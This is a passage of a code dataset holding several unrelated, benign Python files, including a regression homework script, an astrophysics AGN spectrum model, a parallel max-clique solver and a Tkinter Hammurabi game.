data.append([])\n\nn_row = 0\ntext = open('data/train.csv', 'r', encoding='big5') \nrow = csv.reader(text , delimiter=\",\")\nfor r in row:\n    if n_row != 0:\n        for i in range(3,27):\n            if r[i] != \"NR\":\n                data[(n_row-1)%18].append(float(r[i]))\n            else:\n                data[(n_row-1)%18].append(float(0)) \n    n_row = n_row+1\ntext.close()\n\nx = []\ny = []\n\nfor i in range(12):\n    # each month yields 471 windows of 10 consecutive hours\n    for j in range(480-hour):\n        x.append([])\n        # 18 kinds of pollutants\n        for t in range(18):\n            # if t!=9:\n            #     continue\n            # 9 consecutive hours\n            for s in range(hour):\n                x[(480-hour)*i+j].append(data[t][480*i+j+s] )\n                # x[(480-hour)*i+j].append(data[t][480*i+j+s]**2 )\n        y.append(data[9][480*i+j+hour])\nx = np.array(x)\ny = np.array(y)\n\nprint(x.shape)\n# x_mean = np.reshape(np.repeat(x.mean(axis=0),x.shape[0]),x.shape) \n# x_std = np.reshape(np.repeat(x.std(axis=0),x.shape[0]),x.shape) \n# x = (x-x_mean)/x_std\n\n# add square term\n# x = np.concatenate((x,x**2), axis=1)\n\n# add bias\nx = np.concatenate((np.ones((x.shape[0],1)),x), axis=1)\n\nw = np.zeros(len(x[0]))\nl_rate = 10\nrepeat = int(1e6)\n\nx_t = x.transpose()\ns_gra = np.zeros(len(x[0]))\n\ncosts = []\n# pre_cost = 1e6\n\nfor i in range(repeat):\n    hypo = np.dot(x,w)\n    loss = hypo - y\n    cost = np.sum(loss**2 )/ len(x) + lambda_w*np.sum(w**2) \n    # if cost > pre_cost and i>repeat//100:\n    #     break\n    # pre_cost = cost\n    cost_a = math.sqrt(cost)\n    gra = np.dot(x_t,loss) + lambda_w*w*len(x)\n    s_gra += gra**2\n    ada = np.sqrt(s_gra)\n    w = w - l_rate * gra/ada\n    print ('iteration: %d | Cost: %f ' % ( i,cost_a))\n    costs.append(cost_a)\n\n#use closed form to check whether your gradient
descent is good\n# however, this cannot be used in hw1.sh \nw_closed = np.matmul(np.matmul(inv(np.matmul(x.transpose(),x)),x.transpose()),y)\n\n\n# save model\nnp.save(\"model_linear_all_\"+str(hour)+\"_regularized_\"+str(lambda_w)+\".npy\",w)\n# read model\n\n\nplt.xlabel('epoch', fontsize = 18)\nplt.ylabel('cost', fontsize = 18)\nplt.axis([0, len(costs), 4, 10])\n\nd1p, = plt.plot([i for i in range(len(costs))], costs, linewidth=0.5, color='g', markersize=0.3)\nplt.legend([d1p], [\"training cost = \"+str(round(costs[-1],6) )])\n\nplt.savefig('result/traing_curve_linear_all_'+str(hour)+\"_regularized_\"+str(lambda_w)+'.png', format='png', dpi=1000)\n# plt.show()","sub_path":"hw1/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"642018205","text":"import cv2\r\nimport numpy as np\r\n\r\n\r\ndef treat_area_palm(hand_localised, palm, palm_center, copy):\r\n\r\n    palm_area_draw = np.array([(pts[0], pts[1]) for pts in palm if pts != (0, 0)])\r\n    \r\n    if palm_area_draw.size: \r\n        cv2.drawContours(copy, [palm_area_draw], 0, (0, 255, 0), 1)\r\n        palm_area = cv2.contourArea(palm_area_draw)\r\n\r\n        if palm_area < 300: print(\"hand may not be turned palm-on; the hand can be defined\", palm_area)\r\n        elif palm_area > 300: print(\"hand turned palm-on; the hand can be defined\", palm_area)\r\n\r\n    cv2.circle(copy, palm_center, 2, (255, 255, 255), 1)\r\n    [cv2.circle(copy, pts, 2, (0, 0, 0), 1) for pts in palm]\r\n\r\n    #cv2.imshow(\"palm\", copy)\r\n    #cv2.waitKey(0)\r\n\r\n\r\ndef printing(fingers):\r\n    print(\"PALM ANALYSIS\")\r\n    print(\"fingers : \", fingers, \"\\n\")\r\n\r\ndef palm_analyse(hand_localised, palm_center, palm, rectangle, crop,\r\n                 fingers):\r\n\r\n    copy = crop.copy()\r\n    #printing(fingers)\r\n\r\n    treat_area_palm(hand_localised, palm, palm_center, copy)\r\n\r\n\r\n\r\n","sub_path":"hand/palm_analyse.py","file_name":"palm_analyse.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"373864165","text":"import math\nfrom collections import OrderedDict\nfrom lsdj.models.phrase import Phrase\nfrom lsdj.utils import chunks\n\n\ndef get_track_events(track, resolution):\n    semi_quaver = (resolution / 2) / 2\n    notes_at_tick = {}\n\n    # Get time signature events\n    time_sigs = [tick for tick in track if tick.name == 'Time Signature']\n    notes = [tick for tick in track if tick.name == 'Note On']\n    end_of_song = [tick for tick in track if tick.name == 'End of Track'][0]\n    tempos = [tick for tick in track if tick.name == 'Set Tempo']\n    for tick in range(0, (end_of_song.tick + semi_quaver), semi_quaver):\n        notes_at_tick[tick] = []\n\n    for index, note in enumerate(notes):\n        next_note = notes[index + 1] if index != (\n            len(notes) - 1) else end_of_song\n        note_delta = next_note.tick - note.tick\n        if note_delta % semi_quaver == 0:\n            notes_at_tick[note.tick].append(note)\n\n    return {\n        'notes': OrderedDict(\n            sorted(notes_at_tick.items(), key=lambda t: t[0])\n        ),\n        'time_sigs': time_sigs,\n        'end_of_song': end_of_song,\n        'semi_quaver': semi_quaver,\n        'tempos': tempos\n    }\n\n\ndef get_phrases(notes, time_sigs, end_of_song, semi_quaver):\n    phrases = []\n    processed_notes = notes\n    for index, time_sig in enumerate(time_sigs):\n        next_time_sig = time_sigs[index + 1] if index != (len(time_sigs) - 1) else end_of_song\n        fraction_resolution = 16 / time_sig.denominator\n        notes_per_phrase = 
(time_sig.numerator * fraction_resolution)\n time_sig_length = next_time_sig.tick - time_sig.tick\n time_sig_bars = time_sig_length / (notes_per_phrase * semi_quaver)\n for phrase_index in range(0, time_sig_bars):\n start_tick = time_sig.tick + (phrase_index * (notes_per_phrase * semi_quaver))\n end_tick = start_tick + (notes_per_phrase * semi_quaver)\n phrase_count = int(math.ceil(notes_per_phrase / 16)) + 1\n if phrase_count > 1:\n for offset_index, phrase in enumerate(range(0, phrase_count)):\n end_offset = end_tick - ((notes_per_phrase % 16) * semi_quaver)\n new_start_tick = start_tick if offset_index == 0 else end_offset\n new_end_tick = end_offset if offset_index == 0 else end_tick\n note_count = 16 if offset_index == 0 else (notes_per_phrase % 16)\n note_range = range(new_start_tick, new_end_tick, 120)\n phrase_notes = {k: processed_notes[k] for k in note_range}\n notes = OrderedDict(sorted(phrase_notes.items(), key=lambda t: t[0]))\n phrases.append(\n Phrase(\n note_count,\n new_start_tick,\n new_end_tick,\n '{0}/{1}'.format(time_sig.numerator, time_sig.denominator),\n notes\n )\n )\n else:\n note_range = range(start_tick, end_tick, 120)\n phrase_notes = {k: processed_notes[k] for k in note_range}\n notes = OrderedDict(sorted(phrase_notes.items(), key=lambda t: t[0]))\n phrases.append(\n Phrase(\n notes_per_phrase,\n start_tick,\n end_tick,\n '{0}/{1}'.format(time_sig.numerator, time_sig.denominator),\n notes\n )\n )\n\n return phrases\n\n\ndef deduplicate_phrases(phrases, phrase_offset=0):\n b64_phrase_dict = {}\n b64_phrase_keys = []\n\n for phrase in phrases:\n phrase_key = phrase.notes_as_b64\n if not b64_phrase_dict.get(phrase_key, None):\n b64_phrase_dict[phrase_key] = phrase.notes\n b64_phrase_keys.append(phrase_key)\n\n phrase_dict = {}\n phrase_dict_lookup = {}\n phrase_keys = []\n\n for index, key in enumerate(b64_phrase_dict.keys()):\n new_index = index + int(phrase_offset)\n phrase_dict[new_index] = b64_phrase_dict[key]\n phrase_dict_lookup[key] = new_index\n\n for phrase in b64_phrase_keys:\n phrase_keys.append(phrase_dict_lookup[phrase])\n\n return {\n 'phrases': phrase_dict,\n 'keys': phrase_keys\n }\n\n\ndef get_chains(phrase_keys):\n return list(chunks(phrase_keys, 16))\n","sub_path":"lsdj/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"403739194","text":"def add(a,b):\n c=a+b\n print(c)\ndef prime(n):\n temp=0\n for i in range(1,n+1):\n if(n%i==0):\n temp+=1\n if temp==2:\n return True\n else:\n return False\n","sub_path":"01-10-2019/packeges/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"381632359","text":"# -*- coding: utf-8 -*-\n\nfrom openerp.osv import fields, osv\nimport openerp.addons.decimal_precision as dp\n\nclass comisiones_por_producto(osv.osv):\n _name = 'comisiones.producto'\n\n _columns = {\n 'vendedor_id': fields.many2one('hr.employee', 'Vendedor'),\n 'product_id': fields.many2one('product.product', string='Producto'),\n 'porcentaje_comision': fields.float('% Comision'),\n }\n\nclass comisiones_por_categoria_producto(osv.osv):\n _name = 'comisiones.categoria_producto'\n\n _columns = {\n 'vendedor_id': fields.many2one('hr.employee', 'Vendedor'),\n 'categ_id': fields.many2one('product.category', string='Categoria de producto'),\n 'porcentaje_comision': fields.float('% Comision'),\n 
}\n\n\nclass comisiones_por_rango(osv.osv):\n _name = 'comisiones.rango'\n\n _columns = {\n 'vendedor_id': fields.many2one('hr.employee', 'Vendedor'),\n 'categ_id': fields.many2one('product.category', string='Categoria de producto'),\n 'minimo': fields.float('Minimo', required=True),\n 'maximo': fields.float('Maximo', required=True),\n 'porcentaje_comision': fields.float('% Comision', required=True),\n }\n _order = 'categ_id, minimo asc'\n","sub_path":"models/comisiones.py","file_name":"comisiones.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"109184293","text":"import pickle\nimport numpy as np\nimport pandas as pd\nimport time\nfrom model.helper_functions import stub_withhold_split, val_test_features\n\n\nstart_time = time.time(), time.ctime()\nprint(f'Start time: {start_time[1]}')\n\n# Build df of playlists to classify in clusters\nval_pids = np.genfromtxt('../data/val_pids.csv', skip_header=1, dtype=int)\n\n# Import data to memory so it is not loaded from disk for every loop iteration\nplaylist_df = pd.read_csv('../data/playlists.csv')\ntrack_df = pd.read_csv('../data/songs_100000_feat_cleaned.csv', index_col='track_uri')\ntop_artists = np.genfromtxt('../data/top_playlist_defining_artists_train.csv', usecols=0,\n skip_header=0, delimiter=',', dtype=str)\n\n# Create output vessels\nval_stub_feat_dfs = [None]*len(val_pids)\nerrors = 0\n\n# Loop through pids and make features\nfor idx, pid in enumerate(val_pids):\n try:\n stub_tracks, withhold_tracks = stub_withhold_split(pid)\n stub_playlist_feats = val_test_features(stub_tracks, track_df=track_df, top_artists=top_artists, pid=pid)\n val_stub_feat_dfs[idx] = stub_playlist_feats\n except Exception as e:\n print(f'Error for pid {pid}: \\n{e}')\n errors += 1\n\n if (idx + 1) % 100 == 0:\n print(f'[{time.ctime()}] Progress {idx+1} playlists and {errors} errors')\n\nplaylist_features_val = pd.concat(val_stub_feat_dfs, axis=0)\n\nend_time = time.time(), time.ctime()\ntime_elapsed = end_time[0]-start_time[0]\ntime_elapsed = time.strftime('%H:%M:%S', time.gmtime(time_elapsed))\nprint(f'End time: {end_time[1]}, Time elapsed: {time_elapsed}')\n\n# Save output\nplaylist_features_val.to_csv('../data/playlist_features_with_artists_val.csv', sep=',', index=True)\n","sub_path":"model/k6_pre-processing_val.py","file_name":"k6_pre-processing_val.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"528308018","text":"from __future__ import print_function\nimport numpy as np\nimport h5py\nimport powderday.config as cfg\n\n'''\n agn_spectrum using Nenkova+ (2008) torus models. Model calculations from CLUMPY (https://www.clumpy.org). Total spectrum is calculated as (Torus Flux) + (probability of AGN photon escape)x(AGN Flux). AGN spectra are assumed to be piecewise power-law (Rowan-Robinson 1995) with spectral breaks from Nenkova et al. Default CLUMPY model parameters taken from Nenkova et al.\n\n CLUMPY returns spectra in lambda * Flambda (arbitrary units). 
We scale such that the integrated Flambda gives the total IR luminosity.\n\n - Ray Sharma\n'''\n\n\nclass Nenkova2008:\n def __init__(self, params=[5, 30, 0, 1.5, 30, 40]):\n N0, Y, i, q, sig, tv = params\n self.N0 = N0\n self.Y = Y\n self.i = i\n self.q = q\n self.sig = sig\n self.tv = tv\n\n def agn_spectrum(self, log_L_bol):\n try:\n h = h5py.File(cfg.par.BH_modelfile, 'r')\n except:\n raise IOError('Unable to find Nenkova BH model file. '\n 'Check the path in parameters master, or '\n 'download the file here: https://www.clump'\n 'y.org/downloads/clumpy_models_201410_tvav'\n 'g.hdf5')\n\n ix = ((h['N0'][:] == self.N0) &\n (h['Y'][:] == self.Y) &\n (h['i'][:] == self.i) &\n (h['q'][:] == self.q) &\n (h['sig'][:] == self.sig) &\n (h['tv'][:] == self.tv))\n\n nu_vec = 3e14 / h['wave'][:]\n\n frac_AGN_obsc = h['ptype1'][:][ix][0]\n l_band_vec_torus = h['flux_tor'][:][ix][0]\n l_band_vec_AGN = h['flux_toragn'][:][ix][0] - l_band_vec_torus\n l_band_vec = l_band_vec_torus + (frac_AGN_obsc * l_band_vec_AGN)\n\n l_band_vec = self.scale_spectrum(l_band_vec, nu_vec, log_L_bol)\n\n l_band_vec = np.log10(l_band_vec)\n l_band_vec = np.concatenate((l_band_vec, [0, 0, 0, 0]))\n nu_vec = np.log10(nu_vec)\n nu_vec = np.concatenate((nu_vec, [-1, -2, -3, -4]))\n\n to_cgs = np.log10(3.9) + 33\n return nu_vec, l_band_vec + to_cgs\n\n def scale_spectrum(self, l_band_vec, nu_vec, log_L_bol):\n ''' Scale the spectrum by (total IR luminosity) / (integrated spectrum in arb. units)\n '''\n L_IR = 10**self.bol_correct_IR(log_L_bol)\n integrated_spec = np.trapz(l_band_vec / nu_vec, nu_vec)\n norm = L_IR / abs(integrated_spec)\n return l_band_vec * norm\n\n def bol_correct_IR(self, log_L_bol, c1=17.87, k1=0.28, c2=10.03, k2=0.020):\n ''' Return log IR luminosity using bolometric corrections from Hopkins+ (2006). 
Defaults to 15micron band corrections.\n '''\n L_bol = 10**log_L_bol\n L_IR = L_bol / (c1 * pow(L_bol / 1e10, k1) +\n c2 * pow(L_bol / 1e10, k2))\n return np.log10(L_IR)\n","sub_path":"powderday/agn_models/nenkova.py","file_name":"nenkova.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"277316576","text":"import time\nimport networkx as NX\nfrom datetime import timedelta\nfrom multiprocessing import Process, Queue, Value\n\nMETRICS = \"metrics-pattern.txt\"\n\ndef expand(wid, G, K, cand, fini, max_clique_size, calls_made, q_out):\n\n if calls_made is not None:\n with calls_made.get_lock():\n calls_made.value += 1\n\n if len(cand) == 0 and len(fini) == 0:\n with max_clique_size.get_lock():\n if len(K) > max_clique_size.value:\n max_clique_size.value = len(K)\n q_out.put((wid, K.copy()))\n return\n\n pivot = max(cand | fini, key=lambda u: len(cand & set(G.neighbors(u))))\n\n ext = cand - set(G.neighbors(pivot))\n\n for q in ext:\n\n Kq = K | {q}\n\n candq = cand & set(G.neighbors(q))\n finiq = fini & set(G.neighbors(q))\n\n cand = cand - {q}\n fini = fini | {q}\n\n expand(wid, G, Kq, candq, finiq,\n max_clique_size, calls_made, q_out)\n\ndef calc_max_clique(wid, G, max_clique_size, calls_made, q_in, q_out):\n\n quit = False\n\n while not quit:\n\n item = q_in.get()\n\n if item == None:\n quit = True\n continue\n\n if G.degree(item) >= max_clique_size.value:\n\n CAND = {item}\n\n # check if the vertexes\n # verify the clique condition\n for neighbor in G.neighbors(item):\n if G.degree(neighbor) >= max_clique_size.value:\n CAND.add(neighbor)\n\n expand(wid, G, set(), CAND, set(),\n max_clique_size, calls_made, q_out)\n\ndef process_parallel(G, workers_num, calls_made=None):\n\n workers = []\n queues = []\n outq = Queue()\n\n max_clique = []\n max_clique_size = Value('i', 2)\n\n for w in range(workers_num):\n queues.append(Queue())\n\n nodes = G.nodes()\n\n print(\"nodes: {}\".format(nodes))\n\n # Order nodes by its degree\n nodes = list(map(lambda x: (x, G.degree(x)), nodes))\n nodes = sorted(nodes, key=lambda x: x[1])\n nodes = list(map(lambda x: x[0], nodes))\n\n for v in range(len(nodes)):\n queues[v % workers_num].put(nodes[v])\n\n start = time.time()\n\n for w in range(workers_num):\n p = Process(target=calc_max_clique, args=(w, G,\n max_clique_size,\n calls_made,\n queues[w], outq,))\n workers.append(p)\n p.start()\n\n for qw in queues:\n qw.put(None)\n\n for w in workers:\n w.join()\n\n\n count_of_cliques_received = outq.qsize()\n\n # Find the maximum clique\n while not outq.empty(): \n wid, clique = outq.get()\n\n print(\"wid: {}, clique: {}\".format(wid, clique))\n\n if len(clique) > len(max_clique):\n max_clique = clique\n\n return max_clique, count_of_cliques_received\n \n\ndef maxclique(graph, workers_num, loaded=False, metrics=False, name='none'):\n \n if not loaded:\n G = NX.read_edgelist(graph)\n else:\n G = graph\n\n print(\"Graph - Nodes: {}, Edges: {}\".format(\n len(G.nodes()), len(G.edges())))\n\n start = time.time()\n\n max_clique, _ = process_parallel(graph, workers_num)\n \n end = time.time()\n\n d = end - start\n dt = time.strptime(str(timedelta(seconds=d)).split(\".\")[0], \"%H:%M:%S\")\n\n print(\"Delta time: hour: {}, min: {}, sec: {}\".format(\n dt.tm_hour,\n dt.tm_min,\n dt.tm_sec))\n\n # Writes and prints the metrics\n if metrics:\n # Metrics values\n calls_made = Value('i', 0)\n _, count_of_cliques_received = process_parallel(graph, workers_num, 
calls_made=calls_made)\n \n\n print(\"Cliques found: {}, Calls made: {}\".format(\n count_of_cliques_received, calls_made.value))\n\n result_metrics = \"{},{},{},{},{},{}\\n\".format(\n name,\n len(G.nodes()),\n len(G.edges()),\n count_of_cliques_received,\n calls_made.value, d)\n with open(METRICS, \"a\") as f:\n f.write(result_metrics)\n\n return list(max_clique)\n\n\n","sub_path":"pattern/src/algorithms/TTT/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"9657160","text":"#!/usr/bin/env python3\n\"\"\"List command available with provided API key\"\"\"\n\nimport argparse\nimport dreampylib\n\n\ndef main():\n \"\"\"List command available with provided API key\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('apikey', help='Your dreamhost API key')\n args = parser.parse_args()\n\n connection = dreampylib.DreampyLib(args.apikey)\n if not connection.is_connected():\n raise Exception(\"Unable to connect\")\n\n print(\", \".join(dir(connection)))\n\nif __name__ == '__main__':\n main()\n","sub_path":"dreampylib/tools/dh_list_commands.py","file_name":"dh_list_commands.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"8159827","text":"#!/usr/bin/env python\r\nimport tkinter as tk\r\nimport tkinter.font as tkFont\r\nfrom tkinter import scrolledtext\r\nfrom tkinter import messagebox\r\nimport Hammurabi\r\nimport random\r\n\r\n## First Class is for getting player's name\r\n\r\nBUY = +1\r\nSELL = -1\r\n\r\nWIN_W = 370\r\nWIN_H = 510\r\n\r\nclass Welcome:\r\n '''Class to start the Hammurabi game, asking the user for the Ruler's name.'''\r\n def __init__(self, master):\r\n self.master = master\r\n self.master.geometry(\"300x150\")\r\n self.master.minsize(275, 135)\r\n self.master.title(\"Welcome to Babylon!\")\r\n self.frame = tk.Frame(self.master)\r\n self.l1 = tk.Label(self.frame, \r\n text='Oh great Ruler, welcome to Babylon.',\r\n font=('Arial',13))\r\n self.l2 = tk.Label(self.frame, \r\n text='What is your name?',\r\n font=('Arial',10))\r\n self.currentRuler = tk.StringVar()\r\n self.currentRuler.set('Hammurabi')\r\n self.my_name = tk.Entry(self.frame, textvariable = self.currentRuler, width = 20)\r\n self.button1 = tk.Button(self.frame, text = \"Start\", command = self.game_window)\r\n self.helpBtn1 = tk.Button(self.frame, text = \"Help\", command = self.show_start_help)\r\n self.quitButton = tk.Button(self.frame, text = 'Quit', command = self.close_windows)\r\n self.l1.pack(pady=5)\r\n self.l2.pack()\r\n self.my_name.pack()\r\n self.button1.pack(padx = 5, pady=10, side = tk.LEFT, fill = tk.X, expand = True)\r\n self.helpBtn1.pack(padx = 5, pady=10, side = tk.LEFT, fill = tk.X, expand = True)\r\n self.quitButton.pack(padx = 5, pady=10, side = tk.RIGHT, fill = tk.X, expand = True)\r\n self.frame.pack(pady = 10)\r\n \r\n def show_start_help(self):\r\n msg = ''' To play the game of Hammurabi,\r\n Type your name in the box and click \"Start\".\r\n \r\n You will serve your term in office buying & selling land, \r\n planting & harvesting seed, and feeding your people.\r\n \r\n The default term is 10 years. 
If you want a different \r\n term, append it to the name with a # mark, followed \r\n by the number of years, as in Hammurabi#15'''\r\n messagebox.Message(parent=self.master,title='Help',message=msg).show()\r\n \r\n def game_window(self):\r\n self.gameWindow = tk.Toplevel(self.master)\r\n self.gameWindow.title('Oracle of Babylon')\r\n self.master.withdraw()\r\n self.master.title(\"Welcome Back!\")\r\n self.app = GoPlay(self.gameWindow, self.master, self.currentRuler.get())\r\n \r\n def close_windows(self):\r\n self.master.destroy()\r\n\r\nclass GoPlay:\r\n '''Class to run the Hammurabi game in a window.'''\r\n def __init__(self, master, parent, ruler_name):\r\n global BUY\r\n global SELL\r\n self.master = master\r\n self.parent = parent\r\n try:\r\n rulerTerm = int(float(ruler_name.split('#')[1]))\r\n except:\r\n rulerTerm = 10\r\n self.Ruler = Hammurabi.Ruler(ruler_name.split('#')[0], rulerTerm)\r\n \r\n self.master.protocol(\"WM_DELETE_WINDOW\", self.close_windows)\r\n self.master.geometry('x'.join((str(WIN_W),str(WIN_H))))\r\n self.master.minsize(340, 250)\r\n self.master.maxsize(500,600)\r\n \r\n # History Window will keep a running total of actions and results\r\n # Be sure red 'X' doesn't destroy the window!\r\n self.historyWin = tk.Toplevel(self.master)\r\n self.historyWin.title(\"{}'s Record as Ruler\".format(self.Ruler.name))\r\n self.historyWin.protocol(\"WM_DELETE_WINDOW\", self.historyWin.withdraw)\r\n self.historyWin.geometry('x'.join((str(WIN_W+65),str(WIN_H-265))))\r\n self.historyWin.minsize(WIN_W+50, WIN_H-320)\r\n self.historyWin.maxsize(500,600)\r\n hist_head = ('\\t\\t\\t ----- G R A I N -----'+\r\n '\\nYear\\tPop\\tAcres\\tStored\\t Fed \\tHarvest'+\r\n '\\n----\\t---\\t-----\\t------\\t-----\\t-------')\r\n \r\n # Set up some string variables to use as active labels\r\n self.yio = tk.StringVar() #years in office\r\n self.pop = tk.StringVar() #population\r\n self.grn = tk.StringVar() #grain in storage\r\n self.acr = tk.StringVar() #acres owned\r\n self.ppa = tk.StringVar() #price per acres\r\n self.plt = tk.StringVar() #amount to plant\r\n self.plt.set('0')\r\n self.hist = tk.StringVar() #text for running history window\r\n self.hist.set(hist_head)\r\n \r\n self.update_labels()\r\n \r\n self.bs = tk.IntVar() # value state for buying / selling land\r\n self.bs.set(BUY) # BUY is +1, SELL is -1 to increase or decrease acreage\r\n \r\n self.oracle_text = tk.StringVar() # Message to be displayed in bottom frame\r\n self.oracle_text.set(Hammurabi.welcome(to_print=False))\r\n \r\n default_font = tkFont.nametofont(\"TkDefaultFont\")\r\n default_font.configure(size=10)\r\n \r\n # top frame for data output\r\n self.frame_top = tk.LabelFrame(self.master, \r\n width = WIN_W, height = 150,\r\n text = \"Ruler: \"+self.Ruler.name,\r\n ) \r\n # middle frame for entry fields\r\n self.frame_mid = tk.LabelFrame(self.master,\r\n width = WIN_W, height = 200,\r\n text = \"Make your commands:\"\r\n ) \r\n \r\n # bottom frame for report message \r\n self.frame_bot = tk.LabelFrame(self.master,\r\n width = WIN_W, height = 300,\r\n text = \"Message from Oracle:\") \r\n \r\n self.frame_top.pack(side=tk.TOP, padx=5, pady=5, fill=tk.BOTH, expand=False)\r\n self.frame_mid.pack(side=tk.TOP, padx=5, pady=5, fill=tk.BOTH, expand=False)\r\n self.frame_bot.pack(side=tk.TOP, padx=5, pady=5, fill=tk.BOTH, expand=False)\r\n \r\n \r\n # Fill in Top frame, then put items\r\n self.lbl_years = tk.Label(self.frame_top, text = \"Years Served:\")\r\n self.val_years = tk.Label(self.frame_top, textvar = 
self.yio)\r\n self.lbl_pop = tk.Label(self.frame_top, text = \"Population:\")\r\n self.val_pop = tk.Label(self.frame_top, textvar = self.pop)\r\n self.lbl_grain = tk.Label(self.frame_top, text = \"Bushels of Grain:\")\r\n self.val_grain = tk.Label(self.frame_top, textvar = self.grn)\r\n self.lbl_acres = tk.Label(self.frame_top, text = \"Acres of Land:\")\r\n self.val_acres = tk.Label(self.frame_top, textvar = self.acr)\r\n \r\n\r\n self.lbl_years.grid(row=0, column=0, sticky = tk.E)\r\n self.val_years.grid(row=0, column=1, sticky = tk.W)\r\n self.lbl_grain.grid(row=0, column=2, sticky = tk.E)\r\n self.val_grain.grid(row=0, column=3, sticky = tk.W)\r\n self.lbl_pop.grid(row=1, column=0, sticky = tk.E)\r\n self.val_pop.grid(row=1, column=1, sticky = tk.W)\r\n self.lbl_acres.grid(row=1, column=2, sticky = tk.E)\r\n self.val_acres.grid(row=1, column=3, sticky = tk.W)\r\n \r\n # Fill in Middle frame:\r\n self.lbl_landcost = tk.Label(self.frame_mid, text = \"Price of land in bushels per acre:\")\r\n self.val_landcost = tk.Label(self.frame_mid, textvar = self.ppa)\r\n \r\n self.rbn_buy = tk.Radiobutton(self.frame_mid, text=\"Buy\", var=self.bs, value=BUY, command = self.bs_range)\r\n self.rbn_sell = tk.Radiobutton(self.frame_mid, text=\"Sell\", var=self.bs, value=SELL, command = self.bs_range)\r\n maxval = int(self.Ruler.bushels_in_storage / self.Ruler.price_of_land)\r\n self.val_landsale = tk.Spinbox(self.frame_mid, width=5, from_=0, to=maxval, command = self.bs_range)\r\n self.sale_validation = self.frame_mid.register(self.validate_sale)\r\n self.val_landsale.config(validate='all', validatecommand = (self.sale_validation, '%P'))\r\n self.lbl_landsale = tk.Label(self.frame_mid, text=\"acres\")\r\n \r\n self.lbl_feed = tk.Label(self.frame_mid, text=\"Feed the people \")\r\n self.val_feed = tk.Spinbox(self.frame_mid, width=5, from_=0, to=self.grn.get(), increment=5, repeatinterval=20, command = self.bs_range)\r\n self.digit_validation = self.frame_mid.register(self.validate_digit)\r\n self.val_feed.config(validate='all', validatecommand = (self.digit_validation, '%P','%W'))\r\n self.lbl_feed2 = tk.Label(self.frame_mid, text=\"bushels of grain\")\r\n \r\n self.lbl_plant = tk.Label(self.frame_mid, text=\"Plant \")\r\n self.val_plant = tk.Spinbox(self.frame_mid, textvar = self.plt, width=5, from_=0, to=self.get_plant_max(), command = self.bs_range)\r\n self.val_plant.config(validate='all', validatecommand = (self.digit_validation, '%P','%W'))\r\n self.lbl_plant2 = tk.Label(self.frame_mid, text=\"acres\")\r\n \r\n self.goButton = tk.Button(self.frame_mid, \r\n text = ' GO ', \r\n width = 8,\r\n activebackground='green',\r\n highlightcolor='green',\r\n cursor='hand2',\r\n command = self.go_action\r\n )\r\n \r\n self.quitButton = tk.Button(self.frame_mid, \r\n text = 'End', \r\n width = 8,\r\n activebackground='red',\r\n highlightcolor='red',\r\n cursor='hand2',\r\n command = self.close_windows\r\n )\r\n \r\n self.lbl_landcost.grid(row=0, column=0, columnspan = 4, sticky = tk.E + tk.N)\r\n self.val_landcost.grid(row=0, column=4, sticky = tk.W + tk.N)\r\n self.rbn_buy.grid(row=1, column=0, sticky=tk.W)\r\n self.rbn_sell.grid(row=1, column=1, sticky=tk.W)\r\n self.val_landsale.grid(row=1, column=2, sticky=tk.W)\r\n self.lbl_landsale.grid(row=1, column=3, sticky=tk.W)\r\n self.lbl_feed.grid(row=2, column=0, columnspan=2, sticky=tk.E)\r\n self.val_feed.grid(row=2, column=2, sticky=tk.W)\r\n self.lbl_feed2.grid(row=2, column=3, columnspan=2, sticky=tk.W)\r\n self.lbl_plant.grid(row=3, column=0, columnspan=2, 
sticky=tk.E)\r\n self.val_plant.grid(row=3, column=2, sticky=tk.W)\r\n self.lbl_plant2.grid(row=3, column=3, sticky=tk.W)\r\n self.goButton.grid(row=4, column=4, sticky=tk.E, padx=5, pady=5)\r\n self.quitButton.grid(row=4, column=5, sticky=tk.E, padx=5, pady=5)\r\n \r\n\r\n # Fill in Bottom frame:\r\n self.lbl_oracle_msg = tk.Label(self.frame_bot, \r\n textvariable = self.oracle_text,\r\n fg = '#40f',\r\n wraplength=400,\r\n font=('TkDefaultFont',8),\r\n justify=tk.LEFT\r\n )\r\n \r\n self.lbl_oracle_msg.grid(row=0, column=0, sticky=tk.N+tk.W)\r\n \r\n # Set up History Window with a frame and text for hist variable\r\n self.label_hist = tk.Label(self.historyWin, \r\n text = \"History for Ruler: \"+self.Ruler.name,\r\n font = ('TkDefaultFont',15)\r\n )\r\n hist_font = tkFont.nametofont('TkFixedFont')\r\n self.hist_text_area = scrolledtext.ScrolledText(self.historyWin,\r\n width = 50,\r\n height = 10,\r\n font = hist_font,\r\n )\r\n self.hist_text_area.insert('end',self.hist.get())\r\n self.historyWin.grid_columnconfigure(0,weight=1)\r\n self.historyWin.grid_rowconfigure(1,weight=1)\r\n self.historyWin.resizable(width = True, height = True)\r\n self.label_hist.grid(column=0,row=0, padx=10, pady=10, sticky=tk.W)\r\n self.hist_text_area.grid(column=0, row=1, padx=10, pady=10, sticky=tk.W+tk.N+tk.E+tk.S)\r\n self.hist_text_area.configure(state=\"disabled\")\r\n self.historyWin.withdraw()\r\n\r\n # Create a menu so user can pull up the History Window\r\n self.menubar = tk.Menu(self.master)\r\n self.filemenu = 